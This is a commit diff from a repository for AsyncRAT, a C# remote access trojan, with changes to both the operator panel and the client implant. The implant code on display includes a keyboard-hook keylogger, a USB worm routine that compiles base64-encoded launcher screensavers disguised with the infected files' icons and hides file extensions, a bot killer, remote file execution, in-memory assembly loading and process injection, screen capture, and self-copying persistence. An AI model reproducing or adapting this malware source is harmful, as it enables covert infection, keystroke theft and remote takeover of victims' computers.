Sapphire/AsyncRAT-C-Sharp
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update

Browse Source
This commit is contained in:
NYAN CAT 2019-04-25 14:24:12 -07:00
parent cfae8909d7
commit b7f22693f2
20 changed files with 905 additions and 864 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
AsyncRAT-C#/AsyncRAT-Sharp/Forms/DownloadFile.Designer.cs generated
View File

@ -35,6 +35,7 @@
this.labelsize = new System.Windows.Forms.Label();
this.label3 = new System.Windows.Forms.Label();
this.labelfile = new System.Windows.Forms.Label();
this.timer2 = new System.Windows.Forms.Timer(this.components);
this.SuspendLayout();
//
// label1
@ -78,7 +79,13 @@
this.labelfile.TabIndex = 0;
this.labelfile.Text = "..";
//
// SocketDownload
// timer2
//
this.timer2.Enabled = true;
this.timer2.Interval = 2500;
this.timer2.Tick += new System.EventHandler(this.Timer2_Tick);
//
// DownloadFile
//
this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F);
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
@ -90,7 +97,7 @@
this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
this.MaximizeBox = false;
this.MinimizeBox = false;
this.Name = "SocketDownload";
this.Name = "DownloadFile";
this.Text = "SocketDownload";
this.FormClosed += new System.Windows.Forms.FormClosedEventHandler(this.SocketDownload_FormClosed);
this.ResumeLayout(false);
@ -104,5 +111,6 @@
private System.Windows.Forms.Label label3;
public System.Windows.Forms.Label labelfile;
private System.Windows.Forms.Label label1;
private System.Windows.Forms.Timer timer2;
}
}

9
AsyncRAT-C#/AsyncRAT-Sharp/Forms/DownloadFile.cs
View File

@ -8,6 +8,7 @@ using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
using System.Threading;
namespace AsyncRAT_Sharp.Forms
{
@ -34,10 +35,12 @@ namespace AsyncRAT_Sharp.Forms
private void SocketDownload_FormClosed(object sender, FormClosedEventArgs e)
{
if (C != null)
if (C != null) C.Disconnected();
}
private void Timer2_Tick(object sender, EventArgs e)
{
C.Disconnected();
}
if (!C.ClientSocket.Connected) this.Close();
}
}
}

3
AsyncRAT-C#/AsyncRAT-Sharp/Forms/DownloadFile.resx
View File

@ -120,6 +120,9 @@
<metadata name="timer1.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>17, 17</value>
</metadata>
<metadata name="timer2.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>131, 17</value>
</metadata>
<assembly alias="System.Drawing" name="System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" />
<data name="$this.Icon" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>

34
AsyncRAT-C#/AsyncRAT-Sharp/Forms/FileManager.Designer.cs generated
View File

@ -40,11 +40,12 @@
this.downloadToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.uPLOADToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.dELETEToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.eXECUTEToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.imageList1 = new System.Windows.Forms.ImageList(this.components);
this.statusStrip1 = new System.Windows.Forms.StatusStrip();
this.toolStripStatusLabel1 = new System.Windows.Forms.ToolStripStatusLabel();
this.toolStripStatusLabel2 = new System.Windows.Forms.ToolStripStatusLabel();
this.eXECUTEToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.timer1 = new System.Windows.Forms.Timer(this.components);
this.contextMenuStrip1.SuspendLayout();
this.statusStrip1.SuspendLayout();
this.SuspendLayout();
@ -83,48 +84,55 @@
this.dELETEToolStripMenuItem,
this.eXECUTEToolStripMenuItem});
this.contextMenuStrip1.Name = "contextMenuStrip1";
this.contextMenuStrip1.Size = new System.Drawing.Size(241, 223);
this.contextMenuStrip1.Size = new System.Drawing.Size(189, 190);
//
// backToolStripMenuItem
//
this.backToolStripMenuItem.Name = "backToolStripMenuItem";
this.backToolStripMenuItem.Size = new System.Drawing.Size(240, 30);
this.backToolStripMenuItem.Size = new System.Drawing.Size(188, 30);
this.backToolStripMenuItem.Text = "BACK";
this.backToolStripMenuItem.Click += new System.EventHandler(this.backToolStripMenuItem_Click);
//
// toolStripSeparator1
//
this.toolStripSeparator1.Name = "toolStripSeparator1";
this.toolStripSeparator1.Size = new System.Drawing.Size(237, 6);
this.toolStripSeparator1.Size = new System.Drawing.Size(185, 6);
//
// rEFRESHToolStripMenuItem
//
this.rEFRESHToolStripMenuItem.Name = "rEFRESHToolStripMenuItem";
this.rEFRESHToolStripMenuItem.Size = new System.Drawing.Size(240, 30);
this.rEFRESHToolStripMenuItem.Size = new System.Drawing.Size(188, 30);
this.rEFRESHToolStripMenuItem.Text = "REFRESH";
this.rEFRESHToolStripMenuItem.Click += new System.EventHandler(this.rEFRESHToolStripMenuItem_Click);
//
// downloadToolStripMenuItem
//
this.downloadToolStripMenuItem.Name = "downloadToolStripMenuItem";
this.downloadToolStripMenuItem.Size = new System.Drawing.Size(240, 30);
this.downloadToolStripMenuItem.Size = new System.Drawing.Size(188, 30);
this.downloadToolStripMenuItem.Text = "DOWNLOAD";
this.downloadToolStripMenuItem.Click += new System.EventHandler(this.downloadToolStripMenuItem_Click);
//
// uPLOADToolStripMenuItem
//
this.uPLOADToolStripMenuItem.Name = "uPLOADToolStripMenuItem";
this.uPLOADToolStripMenuItem.Size = new System.Drawing.Size(240, 30);
this.uPLOADToolStripMenuItem.Size = new System.Drawing.Size(188, 30);
this.uPLOADToolStripMenuItem.Text = "UPLOAD";
this.uPLOADToolStripMenuItem.Click += new System.EventHandler(this.uPLOADToolStripMenuItem_Click);
//
// dELETEToolStripMenuItem
//
this.dELETEToolStripMenuItem.Name = "dELETEToolStripMenuItem";
this.dELETEToolStripMenuItem.Size = new System.Drawing.Size(240, 30);
this.dELETEToolStripMenuItem.Size = new System.Drawing.Size(188, 30);
this.dELETEToolStripMenuItem.Text = "DELETE";
this.dELETEToolStripMenuItem.Click += new System.EventHandler(this.dELETEToolStripMenuItem_Click);
//
// eXECUTEToolStripMenuItem
//
this.eXECUTEToolStripMenuItem.Name = "eXECUTEToolStripMenuItem";
this.eXECUTEToolStripMenuItem.Size = new System.Drawing.Size(188, 30);
this.eXECUTEToolStripMenuItem.Text = "EXECUTE";
this.eXECUTEToolStripMenuItem.Click += new System.EventHandler(this.eXECUTEToolStripMenuItem_Click);
//
// imageList1
//
this.imageList1.ImageStream = ((System.Windows.Forms.ImageListStreamer)(resources.GetObject("imageList1.ImageStream")));
@ -157,12 +165,11 @@
this.toolStripStatusLabel2.Size = new System.Drawing.Size(20, 25);
this.toolStripStatusLabel2.Text = "..";
//
// eXECUTEToolStripMenuItem
// timer1
//
this.eXECUTEToolStripMenuItem.Name = "eXECUTEToolStripMenuItem";
this.eXECUTEToolStripMenuItem.Size = new System.Drawing.Size(240, 30);
this.eXECUTEToolStripMenuItem.Text = "EXECUTE";
this.eXECUTEToolStripMenuItem.Click += new System.EventHandler(this.eXECUTEToolStripMenuItem_Click);
this.timer1.Enabled = true;
this.timer1.Interval = 1000;
this.timer1.Tick += new System.EventHandler(this.Timer1_Tick);
//
// FileManager
//
@ -199,5 +206,6 @@
private System.Windows.Forms.ToolStripMenuItem dELETEToolStripMenuItem;
private System.Windows.Forms.ToolStripMenuItem rEFRESHToolStripMenuItem;
private System.Windows.Forms.ToolStripMenuItem eXECUTEToolStripMenuItem;
private System.Windows.Forms.Timer timer1;
}
}

5
AsyncRAT-C#/AsyncRAT-Sharp/Forms/FileManager.cs
View File

@ -181,5 +181,10 @@ namespace AsyncRAT_Sharp.Forms
}
}
private void Timer1_Tick(object sender, EventArgs e)
{
if (!C.ClientSocket.Connected) this.Close();
}
}
}

1450
AsyncRAT-C#/AsyncRAT-Sharp/Forms/FileManager.resx
View File

File diff suppressed because it is too large Load Diff

BIN
AsyncRAT-C#/AsyncRAT-Sharp/Resources/Stub.exe
View File

Binary file not shown.

2
AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs
View File

@ -14,6 +14,6 @@ namespace AsyncRAT_Sharp
public static string Password { get; set; }
public static Aes256 aes256{ get; set; }
public static readonly string Version = "AsyncRAT 0.4B";
public static readonly string Version = "AsyncRAT 0.4C";
}
}

15
AsyncRAT-C#/AsyncRAT-Sharp/Socket/Clients.cs
View File

@ -32,6 +32,21 @@ namespace AsyncRAT_Sharp.Sockets
return;
}
int count = 0;
foreach (Clients client in Settings.Online)
{
if (client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0] == socket.RemoteEndPoint.ToString().Split(':')[0])
count++;
}
if (count >= 5)
{
Settings.Blocked.Add(socket.RemoteEndPoint.ToString().Split(':')[0]);
HandleLogs.Addmsg($"Client {socket.RemoteEndPoint.ToString().Split(':')[0]} tried to spam, IP blocked", Color.Red);
Disconnected();
return;
}
ClientSocket = socket;
ClientBuffer = new byte[4];
ClientBufferRecevied = false;

6
AsyncRAT-C#/AsyncRAT-Sharp/Socket/Listener.cs
View File

@ -15,7 +15,7 @@ namespace AsyncRAT_Sharp.Sockets
{
try
{
IPEndPoint IpEndPoint = new IPEndPoint(IPAddress.Any, Convert.ToInt32(port));
IPEndPoint ipEndPoint = new IPEndPoint(IPAddress.Any, Convert.ToInt32(port));
Server = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
{
SendBufferSize = 50 * 1024,
@ -23,7 +23,7 @@ namespace AsyncRAT_Sharp.Sockets
ReceiveTimeout = -1,
SendTimeout = -1,
};
Server.Bind(IpEndPoint);
Server.Bind(ipEndPoint);
Server.Listen(30);
HandleLogs.Addmsg($"Listenning {port}", Color.Green);
Server.BeginAccept(EndAccept, null);
@ -39,7 +39,7 @@ namespace AsyncRAT_Sharp.Sockets
{
try
{
Clients CL = new Clients(Server.EndAccept(ar));
Clients client = new Clients(Server.EndAccept(ar));
}
finally
{

4
AsyncRAT-C#/Client/Handle Packet/BotKiller.cs
View File

@ -33,7 +33,7 @@ namespace Client.Handle_Packet
RegistryDelete(@"Software\Microsoft\Windows\CurrentVersion\RunOnce", pName);
System.Threading.Thread.Sleep(100);
File.Delete(pName);
count += 1;
count++;
}
}
catch { }
@ -52,7 +52,6 @@ namespace Client.Handle_Packet
if (payload == Process.GetCurrentProcess().MainModule.FileName) return false;
if (payload.Contains(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData))) return true;
if (payload.Contains(Environment.GetFolderPath(Environment.SpecialFolder.UserProfile))) return true;
if (payload.Contains(Environment.ExpandEnvironmentVariables("%temp%"))) return true;
if (payload.Contains("wscript.exe")) return true;
if (payload.Contains(RuntimeEnvironment.GetRuntimeDirectory())) return true;
return false;
@ -67,6 +66,7 @@ namespace Client.Handle_Packet
{
using (RegistryKey key = Registry.CurrentUser.OpenSubKey(regPath, true))
{
if (key != null)
foreach (string ValueOfName in key.GetValueNames())
{
if (key.GetValue(ValueOfName).ToString().Equals(payload))

12
AsyncRAT-C#/Client/Handle Packet/FileManager.cs
View File

@ -101,18 +101,18 @@ namespace Client.Handle_Packet
}
}
private void ChunkSend(byte[] Msg, Socket Client)
private void ChunkSend(byte[] msg, Socket client)
{
try
{
byte[] buffersize = BitConverter.GetBytes(Msg.Length);
Client.Poll(-1, SelectMode.SelectWrite);
Client.Send(buffersize);
byte[] buffersize = BitConverter.GetBytes(msg.Length);
client.Poll(-1, SelectMode.SelectWrite);
client.Send(buffersize);
int chunkSize = 50 * 1024;
byte[] chunk = new byte[chunkSize];
int SendPackage;
using (MemoryStream buffereReader = new MemoryStream(Msg))
using (MemoryStream buffereReader = new MemoryStream(msg))
{
BinaryReader binaryReader = new BinaryReader(buffereReader);
int bytesToRead = (int)buffereReader.Length;
@ -120,7 +120,7 @@ namespace Client.Handle_Packet
{
chunk = binaryReader.ReadBytes(chunkSize);
bytesToRead -= chunkSize;
SendPackage = Client.Send(chunk);
SendPackage = client.Send(chunk);
} while (bytesToRead > 0);
binaryReader.Close();

40
AsyncRAT-C#/Client/Handle Packet/HandlePacket.cs
View File

@ -13,12 +13,12 @@ namespace Client.Handle_Packet
{
class HandlePacket
{
public static void Read(object Data)
public static void Read(object data)
{
try
{
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes((byte[])Data);
unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{
case "sendMessage":
@ -36,9 +36,9 @@ namespace Client.Handle_Packet
case "sendFile":
{
Received();
string FullPath = Path.GetTempFileName() + unpack_msgpack.ForcePathObject("Extension").AsString;
unpack_msgpack.ForcePathObject("File").SaveBytesToFile(FullPath);
Process.Start(FullPath);
string fullPath = Path.GetTempFileName() + unpack_msgpack.ForcePathObject("Extension").AsString;
unpack_msgpack.ForcePathObject("File").SaveBytesToFile(fullPath);
Process.Start(fullPath);
if (unpack_msgpack.ForcePathObject("Update").AsString == "true")
{
Uninstall();
@ -49,12 +49,12 @@ namespace Client.Handle_Packet
case "sendMemory":
{
Received();
byte[] Buffer = unpack_msgpack.ForcePathObject("File").GetAsBytes();
string Injection = unpack_msgpack.ForcePathObject("Inject").AsString;
byte[] Plugin = unpack_msgpack.ForcePathObject("Plugin").GetAsBytes();
object[] parameters = new object[] { Buffer, Injection, Plugin };
byte[] buffer = unpack_msgpack.ForcePathObject("File").GetAsBytes();
string injection = unpack_msgpack.ForcePathObject("Inject").AsString;
byte[] plugin = unpack_msgpack.ForcePathObject("Plugin").GetAsBytes();
object[] parameters = new object[] { buffer, injection, plugin };
Thread thread = null;
if (Injection.Length == 0)
if (injection.Length == 0)
{
thread = new Thread(new ParameterizedThreadStart(SendToMemory.Reflection));
}
@ -96,15 +96,15 @@ namespace Client.Handle_Packet
{
case "false":
{
if (RemoteDesktop.RemoteDesktop_Status == false) return;
RemoteDesktop.RemoteDesktop_Status = false;
if (RemoteDesktop.RemoteDesktopStatus == false) return;
RemoteDesktop.RemoteDesktopStatus = false;
}
break;
case "true":
{
if (RemoteDesktop.RemoteDesktop_Status == true) return;
RemoteDesktop.RemoteDesktop_Status = true;
if (RemoteDesktop.RemoteDesktopStatus == true) return;
RemoteDesktop.RemoteDesktopStatus = true;
RemoteDesktop.CaptureAndSend();
}
break;
@ -151,22 +151,22 @@ namespace Client.Handle_Packet
case "uploadFile":
{
string FullPath = unpack_msgpack.ForcePathObject("Name").AsString;
unpack_msgpack.ForcePathObject("File").SaveBytesToFile(FullPath);
string fullPath = unpack_msgpack.ForcePathObject("Name").AsString;
unpack_msgpack.ForcePathObject("File").SaveBytesToFile(fullPath);
}
break;
case "deleteFile":
{
string FullPath = unpack_msgpack.ForcePathObject("File").AsString;
File.Delete(FullPath);
string fullPath = unpack_msgpack.ForcePathObject("File").AsString;
File.Delete(fullPath);
}
break;
case "execute":
{
string FullPath = unpack_msgpack.ForcePathObject("File").AsString;
Process.Start(FullPath);
string fullPath = unpack_msgpack.ForcePathObject("File").AsString;
Process.Start(fullPath);
}
break;
}

13
AsyncRAT-C#/Client/Handle Packet/LimeLogger.cs
View File

@ -24,7 +24,7 @@ namespace Client.Handle_Packet
{
while (true)
{
Thread.Sleep(1000);
Thread.Sleep(500);
if (isON == false)
{
UnhookWindowsHookEx(_hookID);
@ -157,9 +157,8 @@ namespace Client.Handle_Packet
private static string GetActiveWindowTitle()
{
const int nChars = 256;
IntPtr handle = IntPtr.Zero;
StringBuilder Buff = new StringBuilder(nChars);
handle = GetForegroundWindow();
IntPtr handle = GetForegroundWindow();
if (GetWindowText(handle, Buff, nChars) > 0)
{
@ -178,8 +177,7 @@ namespace Client.Handle_Packet
{
string pName;
IntPtr hwnd = GetForegroundWindow();
uint pid;
GetWindowThreadProcessId(hwnd, out pid);
GetWindowThreadProcessId(hwnd, out uint pid);
Process p = Process.GetProcessById((int)pid);
pName = Path.GetFileName(p.MainModule.FileName);
@ -194,9 +192,8 @@ namespace Client.Handle_Packet
#region "Hooks & Native Methods"
private const int WH_KEYBOARD_LL = 13;
private const int WM_KEYDOWN = 0x0100;
private static LowLevelKeyboardProc _proc = HookCallback;
private static readonly LowLevelKeyboardProc _proc = HookCallback;
private static IntPtr _hookID = IntPtr.Zero;
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
@ -209,7 +206,7 @@ namespace Client.Handle_Packet
[DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr GetModuleHandle(string lpModuleName);
private static int WHKEYBOARDLL = 13;
private static readonly int WHKEYBOARDLL = 13;
private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam);

94
AsyncRAT-C#/Client/Handle Packet/LimeUSB.cs
View File

@ -33,28 +33,28 @@ namespace Client.Handle_Packet
{
ExplorerOptions();
int count = 0;
foreach (DriveInfo USB in DriveInfo.GetDrives())
foreach (DriveInfo usb in DriveInfo.GetDrives())
{
try
{
if (USB.DriveType == DriveType.Removable && USB.IsReady)
if (usb.DriveType == DriveType.Removable && usb.IsReady)
{
count += 1;
if (!Directory.Exists(USB.RootDirectory.ToString() + spreadSettings.WorkDirectory))
if (!Directory.Exists(usb.RootDirectory.ToString() + spreadSettings.WorkDirectory))
{
Directory.CreateDirectory(USB.RootDirectory.ToString() + spreadSettings.WorkDirectory);
File.SetAttributes(USB.RootDirectory.ToString() + spreadSettings.WorkDirectory, FileAttributes.System | FileAttributes.Hidden);
Directory.CreateDirectory(usb.RootDirectory.ToString() + spreadSettings.WorkDirectory);
File.SetAttributes(usb.RootDirectory.ToString() + spreadSettings.WorkDirectory, FileAttributes.System | FileAttributes.Hidden);
}
if (!Directory.Exists((USB.RootDirectory.ToString() + spreadSettings.WorkDirectory + "\\" + spreadSettings.IconsDirectory)))
Directory.CreateDirectory((USB.RootDirectory.ToString() + spreadSettings.WorkDirectory + "\\" + spreadSettings.IconsDirectory));
if (!Directory.Exists((usb.RootDirectory.ToString() + spreadSettings.WorkDirectory + "\\" + spreadSettings.IconsDirectory)))
Directory.CreateDirectory((usb.RootDirectory.ToString() + spreadSettings.WorkDirectory + "\\" + spreadSettings.IconsDirectory));
if (!File.Exists(USB.RootDirectory.ToString() + spreadSettings.WorkDirectory + "\\" + spreadSettings.LimeUSBFile))
File.Copy(Application.ExecutablePath, USB.RootDirectory.ToString() + spreadSettings.WorkDirectory + "\\" + spreadSettings.LimeUSBFile);
if (!File.Exists(usb.RootDirectory.ToString() + spreadSettings.WorkDirectory + "\\" + spreadSettings.LimeUSBFile))
File.Copy(Application.ExecutablePath, usb.RootDirectory.ToString() + spreadSettings.WorkDirectory + "\\" + spreadSettings.LimeUSBFile);
CreteDirectory(USB.RootDirectory.ToString());
CreteDirectory(usb.RootDirectory.ToString());
InfectFiles(USB.RootDirectory.ToString());
InfectFiles(usb.RootDirectory.ToString());
}
}
catch (Exception ex)
@ -76,18 +76,18 @@ namespace Client.Handle_Packet
{
try
{
RegistryKey Key = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", true);
if (Key.GetValue("Hidden") != (object)2)
Key.SetValue("Hidden", 2);
if (Key.GetValue("HideFileExt") != (object)1)
Key.SetValue("HideFileExt", 1);
RegistryKey key = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", true);
if (key.GetValue("Hidden") != (object)2)
key.SetValue("Hidden", 2);
if (key.GetValue("HideFileExt") != (object)1)
key.SetValue("HideFileExt", 1);
}
catch { }
}
private void InfectFiles(string Path)
private void InfectFiles(string path)
{
foreach (var file in Directory.GetFiles(Path))
foreach (var file in Directory.GetFiles(path))
{
try
{
@ -101,16 +101,16 @@ namespace Client.Handle_Packet
catch { }
}
foreach (var directory in Directory.GetDirectories(Path))
foreach (var directory in Directory.GetDirectories(path))
{
if (!directory.Contains(spreadSettings.WorkDirectory))
InfectFiles(directory);
}
}
private void CreteDirectory(string USB_Directory)
private void CreteDirectory(string usbDirectory)
{
foreach (var directory in Directory.GetDirectories(USB_Directory))
foreach (var directory in Directory.GetDirectories(usbDirectory))
{
try
{
@ -145,41 +145,41 @@ namespace Client.Handle_Packet
{
try
{
Icon FileIcon = Icon.ExtractAssociatedIcon(file);
MultiIcon MultiIcon = new MultiIcon();
SingleIcon SingleIcon = MultiIcon.Add(Path.GetFileName(file));
SingleIcon.CreateFrom(FileIcon.ToBitmap(), IconOutputFormat.Vista);
SingleIcon.Save(Path.GetPathRoot(file) + spreadSettings.WorkDirectory + "\\" + spreadSettings.IconsDirectory + "\\" + Path.GetFileNameWithoutExtension(file.Replace(" ", null)) + ".ico");
Icon fileIcon = Icon.ExtractAssociatedIcon(file);
MultiIcon multiIcon = new MultiIcon();
SingleIcon singleIcon = multiIcon.Add(Path.GetFileName(file));
singleIcon.CreateFrom(fileIcon.ToBitmap(), IconOutputFormat.Vista);
singleIcon.Save(Path.GetPathRoot(file) + spreadSettings.WorkDirectory + "\\" + spreadSettings.IconsDirectory + "\\" + Path.GetFileNameWithoutExtension(file.Replace(" ", null)) + ".ico");
}
catch { }
}
private void CompileFile(string InfectedFile)
private void CompileFile(string infectedFile)
{
try
{
string Source = Encoding.UTF8.GetString(Convert.FromBase64String("dXNpbmcgU3lzdGVtOwp1c2luZyBTeXN0ZW0uRGlhZ25vc3RpY3M7CnVzaW5nIFN5c3RlbS5SZWZsZWN0aW9uOwp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7CgpbYXNzZW1ibHk6IEFzc2VtYmx5VHJhZGVtYXJrKCIlTGltZSUiKV0KW2Fzc2VtYmx5OiBHdWlkKCIlR3VpZCUiKV0KCnN0YXRpYyBjbGFzcyBMaW1lVVNCTW9kdWxlCnsKICAgIHB1YmxpYyBzdGF0aWMgdm9pZCBNYWluKCkKICAgIHsKICAgICAgICB0cnkKICAgICAgICB7CiAgICAgICAgICAgIFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzLlN0YXJ0KEAiJUZpbGUlIik7CiAgICAgICAgICAgIFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzLlN0YXJ0KEAiJVBheWxvYWQlIik7CiAgICAgICAgfQogICAgICAgIGNhdGNoIHsgfQogICAgfQp9"));
Source = Source.Replace("%Payload%", Path.GetPathRoot(InfectedFile) + spreadSettings.WorkDirectory + "\\" + spreadSettings.LimeUSBFile);
Source = Source.Replace("%File%", InfectedFile.Insert(3, spreadSettings.WorkDirectory + "\\"));
Source = Source.Replace("%Lime%", spreadSettings.InfectedTrademark);
Source = Source.Replace("%LimeUSBModule%", Randomz(new Random().Next(6, 12)));
Source = Source.Replace("%Guid%", Guid.NewGuid().ToString());
string source = Encoding.UTF8.GetString(Convert.FromBase64String("dXNpbmcgU3lzdGVtOwp1c2luZyBTeXN0ZW0uRGlhZ25vc3RpY3M7CnVzaW5nIFN5c3RlbS5SZWZsZWN0aW9uOwp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7CgpbYXNzZW1ibHk6IEFzc2VtYmx5VHJhZGVtYXJrKCIlTGltZSUiKV0KW2Fzc2VtYmx5OiBHdWlkKCIlR3VpZCUiKV0KCnN0YXRpYyBjbGFzcyBMaW1lVVNCTW9kdWxlCnsKICAgIHB1YmxpYyBzdGF0aWMgdm9pZCBNYWluKCkKICAgIHsKICAgICAgICB0cnkKICAgICAgICB7CiAgICAgICAgICAgIFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzLlN0YXJ0KEAiJUZpbGUlIik7CiAgICAgICAgICAgIFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzLlN0YXJ0KEAiJVBheWxvYWQlIik7CiAgICAgICAgfQogICAgICAgIGNhdGNoIHsgfQogICAgfQp9"));
source = source.Replace("%Payload%", Path.GetPathRoot(infectedFile) + spreadSettings.WorkDirectory + "\\" + spreadSettings.LimeUSBFile);
source = source.Replace("%File%", infectedFile.Insert(3, spreadSettings.WorkDirectory + "\\"));
source = source.Replace("%Lime%", spreadSettings.InfectedTrademark);
source = source.Replace("%LimeUSBModule%", Randomz(new Random().Next(6, 12)));
source = source.Replace("%Guid%", Guid.NewGuid().ToString());
CompilerParameters CParams = new CompilerParameters();
Dictionary<string, string> ProviderOptions = new Dictionary<string, string>();
ProviderOptions.Add("CompilerVersion", GetOS());
CompilerParameters cParams = new CompilerParameters();
Dictionary<string, string> providerOptions = new Dictionary<string, string>();
providerOptions.Add("CompilerVersion", GetOS());
string options = "/target:winexe /platform:x86 /optimize+";
if (File.Exists(Path.GetPathRoot(InfectedFile) + spreadSettings.WorkDirectory + "\\" + spreadSettings.IconsDirectory + "\\" + Path.GetFileNameWithoutExtension(InfectedFile.Replace(" ", null)) + ".ico"))
options += " /win32icon:\"" + Path.GetPathRoot(InfectedFile) + spreadSettings.WorkDirectory + "\\" + spreadSettings.IconsDirectory + "\\" + Path.GetFileNameWithoutExtension(InfectedFile.Replace(" ", null)) + ".ico" + "\"";
CParams.GenerateExecutable = true;
CParams.OutputAssembly = InfectedFile + ".scr";
CParams.CompilerOptions = options;
CParams.TreatWarningsAsErrors = false;
CParams.IncludeDebugInformation = false;
CParams.ReferencedAssemblies.Add("System.dll");
if (File.Exists(Path.GetPathRoot(infectedFile) + spreadSettings.WorkDirectory + "\\" + spreadSettings.IconsDirectory + "\\" + Path.GetFileNameWithoutExtension(infectedFile.Replace(" ", null)) + ".ico"))
options += " /win32icon:\"" + Path.GetPathRoot(infectedFile) + spreadSettings.WorkDirectory + "\\" + spreadSettings.IconsDirectory + "\\" + Path.GetFileNameWithoutExtension(infectedFile.Replace(" ", null)) + ".ico" + "\"";
cParams.GenerateExecutable = true;
cParams.OutputAssembly = infectedFile + ".scr";
cParams.CompilerOptions = options;
cParams.TreatWarningsAsErrors = false;
cParams.IncludeDebugInformation = false;
cParams.ReferencedAssemblies.Add("System.dll");
CompilerResults Results = new CSharpCodeProvider(ProviderOptions).CompileAssemblyFromSource(CParams, Source);
CompilerResults results = new CSharpCodeProvider(providerOptions).CompileAssemblyFromSource(cParams, source);
}
catch (Exception ex)
{
@ -189,8 +189,8 @@ namespace Client.Handle_Packet
private string GetOS()
{
var OS = new Microsoft.VisualBasic.Devices.ComputerInfo();
if (OS.OSFullName.Contains("7"))
var os = new Microsoft.VisualBasic.Devices.ComputerInfo();
if (os.OSFullName.Contains("7"))
return "v2.0";
else
return "v4.0";

6
AsyncRAT-C#/Client/Handle Packet/RemoteDesktop.cs
View File

@ -12,15 +12,15 @@ namespace Client.Handle_Packet
{
class RemoteDesktop
{
public static bool RemoteDesktop_Status { get; set; }
public static bool RemoteDesktopStatus { get; set; }
public static void CaptureAndSend()
{
try
{
IUnsafeCodec unsafeCodec = new UnsafeStreamCodec(60);
while (RemoteDesktop_Status == true)
while (RemoteDesktopStatus == true)
{
if (!ClientSocket.Client.Connected) break;
if (!ClientSocket.Client.Connected) RemoteDesktopStatus = false;
Bitmap bmp = GetScreen();
Rectangle rect = new Rectangle(0, 0, bmp.Width, bmp.Height);
Size size = new Size(bmp.Width, bmp.Height);

26
AsyncRAT-C#/Client/Handle Packet/SendToMemory.cs
View File

@ -9,27 +9,27 @@ namespace Client.Handle_Packet
{
public static void Reflection(object obj)
{
object[] Obj = (object[])obj;
byte[] Buffer = (byte[])Obj[0];
Assembly Loader = Assembly.Load(Buffer);
object[] Parameters = null;
if (Loader.EntryPoint.GetParameters().Length > 0)
object[] parameters = (object[])obj;
byte[] buffer = (byte[])parameters[0];
Assembly loader = Assembly.Load(buffer);
object[] parm = null;
if (loader.EntryPoint.GetParameters().Length > 0)
{
Parameters = new object[] { new string[] { null } };
parm = new object[] { new string[] { null } };
}
Loader.EntryPoint.Invoke(null, Parameters);
loader.EntryPoint.Invoke(null, parm);
}
public static void RunPE(object obj)
{
try
{
object[] Parameters = (object[])obj;
byte[] File = (byte[])Parameters[0];
string Injection = Convert.ToString(Parameters[1]);
byte[] Plugin = (byte[])Parameters[2];
Assembly Loader = Assembly.Load(Plugin);
Loader.GetType("Plugin.Program").GetMethod("Run").Invoke(null, new object[] { File, Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), Injection) });
object[] parameters = (object[])obj;
byte[] file = (byte[])parameters[0];
string injection = Convert.ToString(parameters[1]);
byte[] plugin = (byte[])parameters[2];
Assembly loader = Assembly.Load(plugin);
loader.GetType("Plugin.Program").GetMethod("Run").Invoke(null, new object[] { file, Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), injection) });
}
catch { }
}

12
AsyncRAT-C#/Client/Install/NormalStartup.cs
View File

@ -27,14 +27,14 @@ namespace Client.Install
}
}
FileStream Drop;
FileStream fs;
if (File.Exists(Settings.ClientFullPath))
Drop = new FileStream(Settings.ClientFullPath, FileMode.Create);
fs = new FileStream(Settings.ClientFullPath, FileMode.Create);
else
Drop = new FileStream(Settings.ClientFullPath, FileMode.CreateNew);
byte[] Client = File.ReadAllBytes(Process.GetCurrentProcess().MainModule.FileName);
Drop.Write(Client, 0, Client.Length);
Drop.Dispose();
fs = new FileStream(Settings.ClientFullPath, FileMode.CreateNew);
byte[] clientExe = File.ReadAllBytes(Process.GetCurrentProcess().MainModule.FileName);
fs.Write(clientExe, 0, clientExe.Length);
fs.Dispose();
